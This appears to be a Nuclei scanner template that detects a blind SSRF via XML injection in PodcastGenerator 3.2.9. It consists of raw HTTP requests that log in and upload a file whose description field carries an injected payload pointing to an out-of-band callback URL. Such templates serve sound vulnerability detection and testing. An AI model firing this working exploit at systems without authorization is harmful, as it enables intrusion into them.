id: podcast-generator-ssrf info: name: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection author: ritikchaddha,MrHarshvardhan severity: high description: | This is a SSRF vulnerability via Xml injection found in PodcastGenerator 3.2.9. reference: - https://www.exploit-db.com/exploits/51565 - https://mirabbasagalarov.medium.com/podcastgenerator-3-2-9-blind-ssrf-via-xml-injection-3795804467df - https://github.com/PodcastGenerator/PodcastGenerator metadata: verified: true max-request: 3 tags: podcastgenerator,ssrf,authenticated,intrusive variables: string: "{{rand_text_alpha(7)}}" http: - raw: - | POST /podcast/PodcastGenerator/admin/login.php?login=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - | GET /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: {{Hostname}} - | POST /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1WfeHRSBn1aNkQQA ------WebKitFormBoundary1WfeHRSBn1aNkQQA Content-Disposition: form-data; name="file"; filename="{{string}}.jpg" Content-Type: image/jpeg {{rand_text_alpha(50)}} {{rand_text_alpha(50)}} ------WebKitFormBoundary1WfeHRSBn1aNkQQA Content-Disposition: form-data; name="title" {{string}} ------WebKitFormBoundary1WfeHRSBn1aNkQQA Content-Disposition: form-data; name="shortdesc" test]]>http://{{interactsh-url}}' internal: true # digest: 4a0a004730450221008a5f3b9dd7979252a7a14b8be40494f734292f7e0beecf25b6b94ec3fa209a3d022062f7379a4e29a928ff360fb11e6894ee4aa39399be29c922a1f63b6662551c01:922c64590222798bb761d5b6d8e72950